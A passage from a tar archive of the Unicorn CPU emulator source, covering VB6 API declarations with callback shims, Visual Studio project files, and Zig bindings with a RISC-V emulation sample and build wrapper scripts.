hook callback registered by uc_hook_add(). ' NOTE: this should be called only when you no longer want to trace. ' After this, @hh is invalid, and nolonger usable. ' ' @uc: handle returned by uc_open() ' @hh: handle returned by uc_hook_add() ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_hook_del(uc_engine *uc, uc_hook hh); Public Declare Function ucs_hook_del Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal hHook As Long) As uc_err '/* ' Map memory in for emulation. ' This API adds a memory region that can be used by emulation. ' ' @uc: handle returned by uc_open() ' @address: starting address of the new memory region to be mapped in. ' This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. ' @size: size of the new memory region to be mapped in. ' This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. ' @perms: Permissions for the newly mapped region. ' This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, ' or this will return with UC_ERR_ARG error. ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); Public Declare Function ucs_mem_map Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByVal size As Long, ByVal perms As uc_prot) As uc_err '/* ' Map existing host memory in for emulation. ' This API adds a memory region that can be used by emulation. ' ' @uc: handle returned by uc_open() ' @address: starting address of the new memory region to be mapped in. ' This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. ' @size: size of the new memory region to be mapped in. ' This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. ' @perms: Permissions for the newly mapped region. ' This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, ' or this will return with UC_ERR_ARG error. ' @ptr: pointer to host memory backing the newly mapped memory. This host memory is ' expected to be an equal or larger size than provided, and be mapped with at ' least PROT_READ | PROT_WRITE. If it is not, the resulting behavior is undefined. ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr); Public Declare Function ucs_mem_map_ptr Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByVal size As Long, ByVal perms As uc_prot, ByVal ptr As Long) As uc_err '/* ' Unmap a region of emulation memory. ' This API deletes a memory mapping from the emulation memory space. ' ' @uc: handle returned by uc_open() ' @address: starting address of the memory region to be unmapped. ' This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. ' @size: size of the memory region to be modified. ' This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_mem_unmap(uc_engine *uc, uint64_t address, size_t size); Public Declare Function ucs_mem_unmap Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByVal size As Long) As uc_err '/* ' Set memory permissions for emulation memory. ' This API changes permissions on an existing memory region. ' ' @uc: handle returned by uc_open() ' @address: starting address of the memory region to be modified. ' This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. ' @size: size of the memory region to be modified. ' This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. ' @perms: New permissions for the mapped region. ' This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, ' or this will return with UC_ERR_ARG error. ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_mem_protect(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); Public Declare Function ucs_mem_protect Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByVal size As Long, ByVal perm As uc_prot) As uc_err '/* ' Retrieve all memory regions mapped by uc_mem_map() and uc_mem_map_ptr() ' This API allocates memory for @regions, and user must free this memory later ' by free() to avoid leaking memory. ' NOTE: memory regions may be splitted by uc_mem_unmap() ' ' @uc: handle returned by uc_open() ' @regions: pointer to an array of uc_mem_region struct. This is allocated by ' Unicorn, and must be freed by user later ' @count: pointer to number of struct uc_mem_region contained in @regions ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count); 'simplofied for vb use: uc_err __stdcall getMemMap(uc_engine *uc, _CollectionPtr *pColl){ 'fills a collection with csv values of all memory regions.. Public Declare Function get_memMap Lib "ucvbshim.dll" (ByVal hEngine As Long, ByRef col As Collection) As uc_err '/* ' Allocate a region that can be used with uc_context_{save,restore} to perform ' quick save/rollback of the CPU context, which includes registers and some ' internal metadata. Contexts may not be shared across engine instances with ' differing arches or modes. ' ' @uc: handle returned by uc_open() ' @context: pointer to a uc_engine*. This will be updated with the pointer to ' the new context on successful return of this function. ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_context_alloc(uc_engine *uc, uc_context **context); Public Declare Function ucs_context_alloc Lib "ucvbshim.dll" (ByVal hEngine As Long, ByRef context As Long) As uc_err '/* ' Free the resource allocated by uc_context_alloc. ' ' @context: handle returned by uc_context_alloc() ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_free(void* mem); Public Declare Function ucs_free Lib "ucvbshim.dll" (ByVal mem As Long) As uc_err '/* ' Save a copy of the internal CPU context. ' This API should be used to efficiently make or update a saved copy of the ' internal CPU state. ' ' @uc: handle returned by uc_open() ' @context: handle returned by uc_context_alloc() ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_context_save(uc_engine *uc, uc_context *context); Public Declare Function ucs_context_save Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal context As Long) As uc_err '/* ' Restore the current CPU context from a saved copy. ' This API should be used to roll the CPU context back to a previous ' state saved by uc_context_save(). ' ' @uc: handle returned by uc_open() ' @buffer: handle returned by uc_context_alloc that has been used with uc_context_save ' ' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum ' for detailed error). '*/ 'UNICORN_EXPORT 'uc_err uc_context_restore(uc_engine *uc, uc_context *context); Public Declare Function ucs_context_restore Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal context As Long) As uc_err 'uses libdasm to retrieve the 32bit disassembly at a specified va 'int __stdcall disasm_addr(uc_engine *uc, int va, char *str, int bufLen){ Public Declare Function disasm_addr Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Long, ByVal buf As String, ByVal size As Long) As Long 'simplified access to map and write data to emu memory 'uc_err __stdcall mem_write_block(uc_engine *uc, uint64_t address, void* data, uint32_t size, uint32_t perm){ Public Declare Function mem_write_block Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByRef data As Byte, ByVal size As Long, ByVal perm As Long) As uc_err Private Declare Function lstrcpy Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As String) As Long Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long) As Long 'api version of the below.. 'Function err2str(e As uc_err) As String ' Dim lpStr As Long ' Dim length As Long ' Dim buf() As Byte ' ' lpStr = ucs_strerror(e) ' If lpStr = 0 Then Exit Function ' ' length = lstrlen(lpStr) ' If length = 0 Then Exit Function ' ' ReDim buf(1 To length) ' CopyMemory buf(1), ByVal lpStr, length ' ' err2str2 = StrConv(buf, vbUnicode, &H409) ' 'End Function Function err2str(e As uc_err) As String err2str = "Unknown error code: " & e If e = uc_err_ok Then err2str = "No error: everything was fine" If e = UC_ERR_NOMEM Then err2str = "Out-Of-Memory error: uc_open(), uc_emulate()" If e = UC_ERR_ARCH Then err2str = "Unsupported architecture: uc_open()" If e = UC_ERR_HANDLE Then err2str = "Invalid handle" If e = UC_ERR_MODE Then err2str = "Invalid/unsupported mode: uc_open()" If e = UC_ERR_VERSION Then err2str = "Unsupported version (bindings)" If e = UC_ERR_READ_UNMAPPED Then err2str = "Quit emulation due to READ on unmapped memory: uc_emu_start()" If e = UC_ERR_WRITE_UNMAPPED Then err2str = "Quit emulation due to WRITE on unmapped memory: uc_emu_start()" If e = UC_ERR_FETCH_UNMAPPED Then err2str = "Quit emulation due to FETCH on unmapped memory: uc_emu_start()" If e = UC_ERR_HOOK Then err2str = "Invalid hook type: uc_hook_add()" If e = UC_ERR_INSN_INVALID Then err2str = "Quit emulation due to invalid instruction: uc_emu_start()" If e = UC_ERR_MAP Then err2str = "Invalid memory mapping: uc_mem_map()" If e = UC_ERR_WRITE_PROT Then err2str = "Quit emulation due to UC_MEM_WRITE_PROT violation: uc_emu_start()" If e = UC_ERR_READ_PROT Then err2str = "Quit emulation due to UC_MEM_READ_PROT violation: uc_emu_start()" If e = UC_ERR_FETCH_PROT Then err2str = "Quit emulation due to UC_MEM_FETCH_PROT violation: uc_emu_start()" If e = UC_ERR_ARG Then err2str = "Inavalid argument provided to uc_xxx function (See specific function API)" If e = UC_ERR_READ_UNALIGNED Then err2str = "Unaligned read" If e = UC_ERR_WRITE_UNALIGNED Then err2str = "Unaligned write" If e = UC_ERR_FETCH_UNALIGNED Then err2str = "Unaligned fetch" If e = UC_ERR_HOOK_EXIST Then err2str = "hook for this event already existed" If e = UC_ERR_RESOURCE Then err2str = "Insufficient resource: uc_emu_start()" If e = UC_ERR_EXCEPTION Then err2str = "Unhandled CPU exception" End Function Function memType2str(t As uc_mem_type) memType2str = "Unknown memType: " & t If t = UC_MEM_READ Then memType2str = "Memory is read from" If t = uc_mem_write Then memType2str = "Memory is written to" If t = UC_MEM_FETCH Then memType2str = "Memory is fetched" If t = UC_MEM_READ_UNMAPPED Then memType2str = "Unmapped memory is read from" If t = UC_MEM_WRITE_UNMAPPED Then memType2str = "Unmapped memory is written to" If t = UC_MEM_FETCH_UNMAPPED Then memType2str = "Unmapped memory is fetched" If t = UC_MEM_WRITE_PROT Then memType2str = "Write to write protected, but mapped, memory" If t = UC_MEM_READ_PROT Then memType2str = "Read from read protected, but mapped, memory" If t = UC_MEM_FETCH_PROT Then memType2str = "Fetch from non-executable, but mapped, memory" If t = UC_MEM_READ_AFTER Then memType2str = "Memory is read from (successful access)" End Function '--------------------- [ callback support ] --------------------------------------------- 'so the callbacks must live in a module (vb6 language limitation/safety feature) 'we use a simple lookup mechanism to support multiple instances Function findInstance(ptr As Long) As ucIntel32 On Error Resume Next Set findInstance = instances("objptr:" & ptr) End Function 'in case we want to keep userdata for something else..this is just as easy.. Function findInstanceByUc(uc As Long) As ucIntel32 Dim u As ucIntel32 For Each u In instances If u.uc = uc Then Set findInstanceByUc = u Exit Function End If Next End Function 'typedef void (__stdcall *vb_cb_hookcode_t) (uc_engine *uc, uint64_t address, uint32_t size, void *user_data); Public Sub code_hook(ByVal uc As Long, ByVal address As Currency, ByVal size As Long, ByVal user_data As Long) Dim u As ucIntel32 Set u = findInstance(user_data) If u Is Nothing Then Exit Sub u.internal_code_hook address, size End Sub Public Sub block_hook(ByVal uc As Long, ByVal address As Currency, ByVal size As Long, ByVal user_data As Long) Dim u As ucIntel32 Set u = findInstance(user_data) If u Is Nothing Then Exit Sub u.internal_block_hook address, size End Sub 'typedef void (*uc_cb_hookmem_t)(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data); Public Sub mem_hook(ByVal uc As Long, ByVal t As uc_mem_type, ByVal address As Currency, ByVal size As Long, ByVal value As Currency, ByVal user_data As Long) Dim u As ucIntel32 Set u = findInstance(user_data) If u Is Nothing Then Exit Sub u.internal_mem_hook t, address, size, value End Sub 'typedef bool (*uc_cb_eventmem_t)(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data); Public Function invalid_mem_hook(ByVal uc As Long, ByVal t As uc_mem_type, ByVal address As Currency, ByVal size As Long, ByVal value As Currency, ByVal user_data As Long) As Long 'return 0 to stop emulation, 1 to continue Dim u As ucIntel32 Set u = findInstance(user_data) If u Is Nothing Then Exit Function invalid_mem_hook = u.internal_invalid_mem_hook(t, address, size, value) End Function 'typedef void (*vb_cb_hookintr_t)(uc_engine *uc,uint32_t intno, void *user_data); Public Sub interrupt_hook(ByVal uc As Long, ByVal intno As Long, ByVal user_data As Long) Dim u As ucIntel32 Set u = findInstance(user_data) If u Is Nothing Then Exit Sub u.internal_interrupt_hook intno End Sub �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/ucvbshim.sln�������������������������������������������������������������0000664�0000000�0000000�00000001561�14675241067�0020037�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ Microsoft Visual Studio Solution File, Format Version 10.00 # Visual Studio 2008 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ucvbshim", "ucvbshim.vcproj", "{6FC797B7-2985-49C8-92CD-CA985AF3511C}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|Win32 = Debug|Win32 Release|Win32 = Release|Win32 EndGlobalSection GlobalSection(ProjectConfigurationPlatforms) = postSolution {6FC797B7-2985-49C8-92CD-CA985AF3511C}.Debug|Win32.ActiveCfg = Debug|Win32 {6FC797B7-2985-49C8-92CD-CA985AF3511C}.Debug|Win32.Build.0 = Debug|Win32 {6FC797B7-2985-49C8-92CD-CA985AF3511C}.Release|Win32.ActiveCfg = Release|Win32 {6FC797B7-2985-49C8-92CD-CA985AF3511C}.Release|Win32.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE EndGlobalSection EndGlobal �����������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/ucvbshim.vcproj����������������������������������������������������������0000664�0000000�0000000�00000010147�14675241067�0020546�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?xml version="1.0" encoding="Windows-1252"?> <VisualStudioProject ProjectType="Visual C++" Version="9.00" Name="ucvbshim" ProjectGUID="{6FC797B7-2985-49C8-92CD-CA985AF3511C}" RootNamespace="My1" Keyword="Win32Proj" TargetFrameworkVersion="196613" > <Platforms> <Platform Name="Win32" /> </Platforms> <ToolFiles> </ToolFiles> <Configurations> <Configuration Name="Debug|Win32" OutputDirectory="$(SolutionDir)$(ConfigurationName)" IntermediateDirectory="$(ConfigurationName)" ConfigurationType="2" CharacterSet="2" > <Tool Name="VCPreBuildEventTool" /> <Tool Name="VCCustomBuildTool" /> <Tool Name="VCXMLDataGeneratorTool" /> <Tool Name="VCWebServiceProxyGeneratorTool" /> <Tool Name="VCMIDLTool" /> <Tool Name="VCCLCompilerTool" Optimization="0" AdditionalIncludeDirectories="./../../include/" PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE;" MinimalRebuild="true" BasicRuntimeChecks="3" RuntimeLibrary="1" UsePrecompiledHeader="0" WarningLevel="3" DebugInformationFormat="4" /> <Tool Name="VCManagedResourceCompilerTool" /> <Tool Name="VCResourceCompilerTool" /> <Tool Name="VCPreLinkEventTool" /> <Tool Name="VCLinkerTool" OutputFile="./ucvbshim.dll" LinkIncremental="2" GenerateManifest="false" ModuleDefinitionFile="" GenerateDebugInformation="true" SubSystem="1" TargetMachine="1" /> <Tool Name="VCALinkTool" /> <Tool Name="VCManifestTool" EmbedManifest="false" /> <Tool Name="VCXDCMakeTool" /> <Tool Name="VCBscMakeTool" /> <Tool Name="VCFxCopTool" /> <Tool Name="VCAppVerifierTool" /> <Tool Name="VCPostBuildEventTool" /> </Configuration> <Configuration Name="Release|Win32" OutputDirectory="$(SolutionDir)$(ConfigurationName)" IntermediateDirectory="$(ConfigurationName)" ConfigurationType="2" CharacterSet="2" WholeProgramOptimization="1" > <Tool Name="VCPreBuildEventTool" /> <Tool Name="VCCustomBuildTool" /> <Tool Name="VCXMLDataGeneratorTool" /> <Tool Name="VCWebServiceProxyGeneratorTool" /> <Tool Name="VCMIDLTool" /> <Tool Name="VCCLCompilerTool" Optimization="2" EnableIntrinsicFunctions="true" AdditionalIncludeDirectories="./../../include/" PreprocessorDefinitions="WIN32;NDEBUG;_CONSOLE;" RuntimeLibrary="0" EnableFunctionLevelLinking="true" UsePrecompiledHeader="0" WarningLevel="3" DebugInformationFormat="3" /> <Tool Name="VCManagedResourceCompilerTool" /> <Tool Name="VCResourceCompilerTool" /> <Tool Name="VCPreLinkEventTool" /> <Tool Name="VCLinkerTool" OutputFile="./ucvbshim.dll" LinkIncremental="1" GenerateManifest="false" GenerateDebugInformation="true" SubSystem="1" OptimizeReferences="2" EnableCOMDATFolding="2" TargetMachine="1" /> <Tool Name="VCALinkTool" /> <Tool Name="VCManifestTool" EmbedManifest="false" /> <Tool Name="VCXDCMakeTool" /> <Tool Name="VCBscMakeTool" /> <Tool Name="VCFxCopTool" /> <Tool Name="VCAppVerifierTool" /> <Tool Name="VCPostBuildEventTool" /> </Configuration> </Configurations> <References> </References> <Files> <Filter Name="Source Files" Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx" UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}" > <File RelativePath=".\main.cpp" > </File> </Filter> <Filter Name="Header Files" Filter="h;hpp;hxx;hm;inl;inc;xsd" UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}" > <File RelativePath="..\..\include\unicorn\unicorn.h" > </File> <File RelativePath="..\..\include\x86.h" > </File> </Filter> </Files> <Globals> </Globals> </VisualStudioProject> �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/�������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015572�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/README.md����������������������������������������������������������������0000664�0000000�0000000�00000001257�14675241067�0017056�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Unicorn-engine-Zig [Zig](https://ziglang.org/) bindings for the [Unicorn](http://www.unicorn-engine.org/) emulator with utility functions. *Unicorn* is a lightweight multi-platform, multi-architecture CPU emulator framework based on [QEMU](http://www.qemu.org/). ## How to use Using the [Zig Build System](https://ziglang.org/learn/build-system/), you can include the following into your local `build.zig.zon` ``` zig .{ .dependencies = .{ .unicorn = .{ .url = "https://github.com/unicorn-engine/unicorn/archive/<ref SHA>.tar.gz", .hash = "<hash>", } }, } ``` Note that currently the only module exported publicly is `unicorn-sys` �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/sample/������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017053�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/sample/sample_riscv_zig.zig����������������������������������������������0000664�0000000�0000000�00000021164�14675241067�0023132�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������//! Based on: ../../../samples/sample_riscv.c const unicorn = @import("unicorn"); const unicornC = unicorn.c; const log = unicorn.log; const RISCV_CODE = "\x13\x05\x10\x00\x93\x85\x05\x02"; const ADDRESS = 0x10000; pub fn main() !void { try test_recover_from_illegal(); log.info("------------------", .{}); try test_riscv2(); log.info("------------------", .{}); try test_riscv_func_return(); } fn hook_block(uc: ?*unicornC.uc_engine, address: u64, size: u32, user_data: ?*anyopaque) callconv(.C) void { _ = user_data; _ = uc; log.info(">>> Tracing basic block at 0x{}, block size = 0x{}", .{ address, size }); } fn hook_code(uc: ?*unicornC.uc_engine, address: u64, size: u32, user_data: ?*anyopaque) callconv(.C) void { _ = user_data; _ = uc; log.info(">>> Tracing instruction at 0x{}, instruction size = 0x{}", .{ address, size }); } fn hook_code3(uc: ?*unicornC.uc_engine, address: u64, size: u32, user_data: ?*anyopaque) callconv(.C) void { _ = user_data; log.info(">>> Tracing instruction at 0x{}, instruction size = 0x{}", .{ address, size }); if (address == ADDRESS) { log.info("stop emulation"); unicorn.uc_emu_stop(uc) catch |err| log.err("Error: {}", .{err}); } } fn hook_memalloc(uc: ?*unicornC.uc_engine, @"type": unicornC.uc_mem_type, address: u64, size: u32, user_data: ?*anyopaque) callconv(.C) bool { _ = user_data; _ = @"type"; const algined_address = address & 0xFFFFFFFFFFFFF000; const aligned_size = (@as(u32, @intCast(size / 0x1000)) + 1) * 0x1000; log.info(">>> Allocating block at 0x{} (0x{}), block size = 0x{} (0x{})", .{ address, algined_address, size, aligned_size }); unicorn.uc_mem_map(uc, algined_address, aligned_size, unicornC.UC_PROT_ALL) catch |err| log.err("Error: {}", .{err}); // this recovers from missing memory, so we return true return true; } fn test_recover_from_illegal() !void { var uc: ?*unicornC.uc_engine = null; var trace1: unicornC.uc_hook = undefined; var trace2: unicornC.uc_hook = undefined; var mem_alloc: unicornC.uc_hook = undefined; var a0: u64 = 0x1234; var a1: u64 = 0x7890; log.info("Emulate RISCV code: recover_from_illegal", .{}); // Initialize emulator in RISCV64 mode unicorn.uc_open(unicornC.UC_ARCH_RISCV, unicornC.UC_MODE_RISCV64, &uc) catch |err| { log.err("Failed on uc_open() with error returned: {}", .{err}); return; }; try unicorn.uc_reg_write(uc, unicornC.UC_RISCV_REG_A0, &a0); try unicorn.uc_reg_write(uc, unicornC.UC_RISCV_REG_A1, &a1); // map 2MB memory for this emulation try unicorn.uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, unicornC.UC_PROT_ALL); // auto-allocate memory on access try unicorn.uc_hook_add(uc, &mem_alloc, unicornC.UC_HOOK_MEM_UNMAPPED, @as(?*anyopaque, @ptrCast(@constCast(&hook_memalloc))), null, 1, 0); // tracing all basic blocks with customized callback try unicorn.uc_hook_add(uc, &trace1, unicornC.UC_HOOK_BLOCK, @as(?*anyopaque, @ptrCast(@constCast(&hook_block))), null, 1, 0); // tracing all instruction try unicorn.uc_hook_add(uc, &trace2, unicornC.UC_HOOK_CODE, @as(?*anyopaque, @ptrCast(@constCast(&hook_code))), null, 1, 0); // write machine code to be emulated to memory try unicorn.uc_mem_write(uc, ADDRESS, RISCV_CODE, RISCV_CODE.len - 1); // emulate 1 instruction, wrong address, illegal code unicorn.uc_emu_start(uc, 0x1000, @as(u64, @bitCast(@as(i64, -1))), 0, 1) catch |err| log.err("Expected Illegal Instruction error, got: {} ({s})", .{ err, unicorn.uc_strerror(err) }); // emulate 1 instruction, correct address, valid code unicorn.uc_emu_start(uc, ADDRESS, @as(u64, @bitCast(@as(i64, -1))), 0, 1) catch |err| log.err("Failed on uc_emu_start() with error returned: {}", .{err}); // now print out some registers log.info(">>> Emulation done. Below is the CPU context", .{}); try unicorn.uc_reg_read(uc, unicornC.UC_RISCV_REG_A0, @as(?*anyopaque, @ptrCast(@constCast(&a0)))); try unicorn.uc_reg_read(uc, unicornC.UC_RISCV_REG_A1, @as(?*anyopaque, @ptrCast(@constCast(&a1)))); log.info(">>> A0 = 0x{}", .{a0}); log.info(">>> A1 = 0x{}", .{a1}); try unicorn.uc_close(uc); } fn test_riscv_func_return() !void { var uc: ?*unicornC.uc_engine = null; var trace1: unicornC.uc_hook = undefined; var trace2: unicornC.uc_hook = undefined; var pc: u64 = 0; var ra: u64 = 0; const CODE = "\x67\x80\x00\x00\x82\x80\x01\x00\x01\x00"; log.info("Emulate RISCV code: return from func", .{}); // Initialize emulator in RISCV64 mode unicorn.uc_open(unicornC.UC_ARCH_RISCV, unicornC.UC_MODE_RISCV64, &uc) catch |err| { log.err("Failed on uc_open() with error returned: {} ({s})", .{ err, unicorn.uc_strerror(err) }); return; }; // map 2MB memory for this emulation try unicorn.uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, unicornC.UC_PROT_ALL); // write machine code to be emulated to memory try unicorn.uc_mem_write(uc, ADDRESS, CODE, CODE.len - 1); // tracing all basic blocks with customized callback try unicorn.uc_hook_add(uc, &trace1, unicornC.UC_HOOK_BLOCK, @as(?*anyopaque, @ptrCast(@constCast(&hook_block))), null, 1, 0); // tracing all instruction try unicorn.uc_hook_add(uc, &trace2, unicornC.UC_HOOK_CODE, @as(?*anyopaque, @ptrCast(@constCast(&hook_code))), null, 1, 0); ra = 0x10006; try unicorn.uc_reg_write(uc, unicornC.UC_RISCV_REG_RA, @as(?*anyopaque, @ptrCast(@constCast(&ra)))); log.info("========", .{}); // execute c.ret instruction unicorn.uc_emu_start(uc, 0x10004, @as(u64, @bitCast(@as(i64, -1))), 0, 1) catch |err| { log.err("Failed on uc_emu_start() with error returned: {}", .{err}); }; try unicorn.uc_reg_read(uc, unicornC.UC_RISCV_REG_PC, @as(?*anyopaque, @ptrCast(@constCast(&pc)))); if (pc != ra) { log.info("Error after execution: PC is: 0x{}, expected was 0x{}", .{ pc, ra }); if (pc == 0x10004) { log.info(" PC did not change during execution", .{}); } } else { log.info("Good, PC == RA", .{}); } // now print out some registers log.info(">>> Emulation done.", .{}); try unicorn.uc_close(uc); } fn test_riscv2() !void { var uc: ?*unicornC.uc_engine = null; var trace1: unicornC.uc_hook = undefined; var trace2: unicornC.uc_hook = undefined; var a0: u32 = 0x1234; var a1: u32 = 0x7890; log.info("Emulate RISCV code: split emulation", .{}); // Initialize emulator in RISCV64 mode unicorn.uc_open(unicornC.UC_ARCH_RISCV, unicornC.UC_MODE_RISCV32, &uc) catch |err| { log.err("Failed on unicornC.uc_open() with error returned: {} ({s})", .{ err, unicorn.uc_strerror(err) }); return; }; // map 2MB memory for this emulation try unicorn.uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, unicornC.UC_PROT_ALL); // write machine code to be emulated to memory try unicorn.uc_mem_write(uc, ADDRESS, RISCV_CODE, RISCV_CODE.len - 1); // initialize machine registers try unicorn.uc_reg_write(uc, unicornC.UC_RISCV_REG_A0, @as(?*anyopaque, @ptrCast(@constCast(&a0)))); try unicorn.uc_reg_write(uc, unicornC.UC_RISCV_REG_A1, @as(?*anyopaque, @ptrCast(@constCast(&a1)))); // tracing all basic blocks with customized callback try unicorn.uc_hook_add(uc, &trace1, unicornC.UC_HOOK_BLOCK, @as(?*anyopaque, @ptrCast(@constCast(&hook_block))), null, 1, 0); // tracing all instruction try unicorn.uc_hook_add(uc, &trace2, unicornC.UC_HOOK_CODE, @as(?*anyopaque, @ptrCast(@constCast(&hook_block))), null, 1, 0); // emulate 1 instruction unicorn.uc_emu_start(uc, ADDRESS, ADDRESS + 4, 0, 0) catch |err| { log.err("Failed on unicornC.uc_emu_start() with error returned: {}", .{err}); }; try unicorn.uc_reg_read(uc, unicornC.UC_RISCV_REG_A0, @as(?*anyopaque, @ptrCast(@constCast(&a0)))); try unicorn.uc_reg_read(uc, unicornC.UC_RISCV_REG_A1, @as(?*anyopaque, @ptrCast(@constCast(&a1)))); log.info(">>> A0 = 0x{}", .{a0}); log.info(">>> A1 = 0x{}", .{a1}); // emulate one more instruction unicorn.uc_emu_start(uc, ADDRESS + 4, ADDRESS + 8, 0, 0) catch |err| { log.err("Failed on unicornC.uc_emu_start() with error returned: {}", .{err}); }; // now print out some registers log.info(">>> Emulation done. Below is the CPU context", .{}); try unicorn.uc_reg_read(uc, unicornC.UC_RISCV_REG_A0, @as(?*anyopaque, @ptrCast(@constCast(&a0)))); try unicorn.uc_reg_read(uc, unicornC.UC_RISCV_REG_A1, @as(?*anyopaque, @ptrCast(@constCast(&a1)))); log.info(">>> A0 = 0x{}", .{a0}); log.info(">>> A1 = 0x{}", .{a1}); try unicorn.uc_close(uc); } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/tools/�������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016732�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/tools/zigcc.cmd����������������������������������������������������������0000664�0000000�0000000�00000000046�14675241067�0020516�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������@echo off zig cc -fno-sanitize=all %*������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/tools/zigcc.sh�����������������������������������������������������������0000775�0000000�0000000�00000000071�14675241067�0020366�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#! /usr/bin/env bash `which zig` cc -fno-sanitize=all 